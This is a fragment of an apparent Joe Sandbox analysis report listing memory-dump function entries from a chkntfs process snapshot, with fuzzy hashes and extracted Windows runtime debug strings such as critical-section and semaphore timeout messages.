                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 04847B8E
                                                    • RTL: Re-Waiting, xrefs: 04847BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04847B7F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: ab2141bf535eb43637b0030a1a824acb08707638cd35ca2647cd5991f15c2590
                                                    • Instruction ID: d22f8e1d596d340979539e2ca376c5312166d913c4d89ca3df1ae91314758f9c
                                                    • Opcode Fuzzy Hash: ab2141bf535eb43637b0030a1a824acb08707638cd35ca2647cd5991f15c2590
                                                    • Instruction Fuzzy Hash: 9941ED317017069FD724DE29CD40B6AB7E5EB88714F004F2DE99AEB290DB70F8458B92
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0484728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 048472A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04847294
                                                    • RTL: Re-Waiting, xrefs: 048472C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 5b4f41b14f0395ef5c4735fa652205505a04ecf7db130a93fe4475f4c55badd8
                                                    • Instruction ID: cd9b905636022055aa6bb43668806021aee55bfc0f68b65f56ed9c8a07c9e2ae
                                                    • Opcode Fuzzy Hash: 5b4f41b14f0395ef5c4735fa652205505a04ecf7db130a93fe4475f4c55badd8
                                                    • Instruction Fuzzy Hash: BC41107170061AAFD720DE68CC41B66B7A5FB84718F104F19FA56EB680DB60F8428BD2
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: f5d62f779be9b9893652d27ac7113d4838b694a605696e90aa0def9ec3b97bd0
                                                    • Instruction ID: d9acf053aa10d35b92e2d69f3594c78670868e4b90ffc6f59b0407da318c82db
                                                    • Opcode Fuzzy Hash: f5d62f779be9b9893652d27ac7113d4838b694a605696e90aa0def9ec3b97bd0
                                                    • Instruction Fuzzy Hash: C4318B766001199FDB20DE2CCD50BEEB7F8EF44714F844A9AE849E3200EB30BA448F61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: b620d45d1a887b8294cc72f3a2b06c7c13bb1966012c43845088fc5bbf4832c6
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 50919171E0021A9BDB24DE69C881ABFB7E9AF44724F144F1FEC55E72E0E770A9408761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: a790510eb277882791d6407faca28dae2d2b0d4520696e3b8281074e7c692c2f
                                                    • Instruction ID: c5aa6d7c078e5bb6e2813a0da6e7137393c4e1025998ef3aa8855a633778ad66
                                                    • Opcode Fuzzy Hash: a790510eb277882791d6407faca28dae2d2b0d4520696e3b8281074e7c692c2f
                                                    • Instruction Fuzzy Hash: 89810DB1D002699BDB31DF54CC45BEAB7B4AF48714F0446EAEA19B7240E7746E84CFA0